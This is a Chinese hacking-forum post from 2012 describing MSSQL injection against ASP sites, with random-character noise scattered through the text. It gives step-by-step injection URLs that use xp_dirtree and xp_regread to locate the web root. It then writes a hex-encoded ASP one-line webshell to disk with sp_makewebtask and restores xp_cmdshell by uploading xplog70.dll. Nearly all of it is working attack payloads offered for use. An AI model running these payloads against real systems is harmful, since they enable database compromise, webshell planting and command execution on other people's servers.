找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MSsqlL注入取得网站路径最好的方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2690|回复: 0
打印 上一主题 下一主题

MSsqlL注入取得网站路径最好的方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:20:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好,我们exec master..xp_dirtree'd:/test'
4 d9 J6 e$ P( L: E' S3 M% _* \假设我们在test里有两个文件夹test1和test2在test1里又有test3
$ D1 L$ @2 M0 W; V  w结果显示/ O- y" X$ R! D% y) G8 ~

6 G! ?9 ?% K' x6 A9 ~) u3 Psubdirectory depth
9 n5 w# ]' M9 b' R, |- A7 c; _% vtest1 1
7 l& w$ j* L* b+ @test3 2
$ ]# K2 N9 t0 I1 `$ Y* T. ftest2 1. w2 W* A3 j1 c1 e
4 @9 _# f, Q6 s( x3 b
哈哈发现没有那个depth就是目录的级数7 z1 ^0 A7 B. a2 t" O! l
ok了,知道怎么办了吧
+ D% f" b% a# E& T4 ?
0 H8 l0 b7 U5 p! y) Q* M& ?+ @' phttp://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
$ F9 p+ t# n: hhttp://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' -- & v2 [8 X* ~. p+ z, E3 Y, r
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-+ a. G+ V6 w  [& K

7 `# f4 Z% b: I0 D4 n只要加上id=1,就是第一级目录 。( l) n7 r! y* p& P# v
6 e$ G0 O  o4 \% \' E/ K

! C3 f, V- z( {1 g0 c* @& `  g通过注册表读网站路径:
' N4 S1 V  I' w4 C+ |1 H2 b! h4 O9 h4 h& ]3 q& z
1.;create table [dbo].[cyfd] ([gyfd][char](255));9 t/ x2 ^: N6 D7 F/ c0 E) v9 q- S! T
& Q! U6 ~9 u+ R+ m2 y6 |
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--/ g/ M, x' o, g8 s; A/ t
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
7 G' N+ G  n; ~; E$ |4 z* W7 o
% o( a) v$ c; o, d! Y3.and 1=(select count(*) from 临时表 where 临时字段名>1)
8 Y; q4 o( y0 J5 ^6 n% Iand 1=(select count(*) from cyfd where gyfd > 1)
5 W1 \' v6 H; [& A( S8 j2 R) _这样IE报错,就把刚才插进去的Web路径的值报出来了
4 R) c% }( n* W7 F; `! q, M5 Z' B
* z* n6 `1 G0 o/ e1 y) h4.drop table cyfd;-- 删除临时表" {" s" o0 d  d4 S
" b6 t. h6 O1 I1 d  D
获得webshell方法:
' ^2 K9 h# `. j* S! {6 \1.create table cmd (a image)-- \**cmd是创建的临时表
' S5 V9 ~) K$ F8 O: S6 N
1 M! e! w; ]: N. W/ A& i7 F% k2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
" d% i) S7 p9 c6 z# {0 Q, x5 e
, U4 t2 u0 U0 E" E8 D; ?* d  a6 `
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'6 c! R2 W4 @  }* G, n  `+ [6 w8 v
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'$ S$ T2 d6 ^* H0 ^
% Y, I* Y( X& i
4.drop table cmd;-- 删除cmd临时表1 {4 P6 L+ N* F9 f

+ u4 B% R, p, A  M  ~6 |6 i3 g- I恢复xp_cmdshell方法之一:
% i- W3 b; Z' E3 n/ m& |6 j% _我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
4 `8 S% K# l4 ?http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'1 l, Q! o( y2 ^' f4 o6 O% N+ \- @
恢复,支持绝对路径的恢复哦。:)
/ [/ X* X1 {, U) r
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表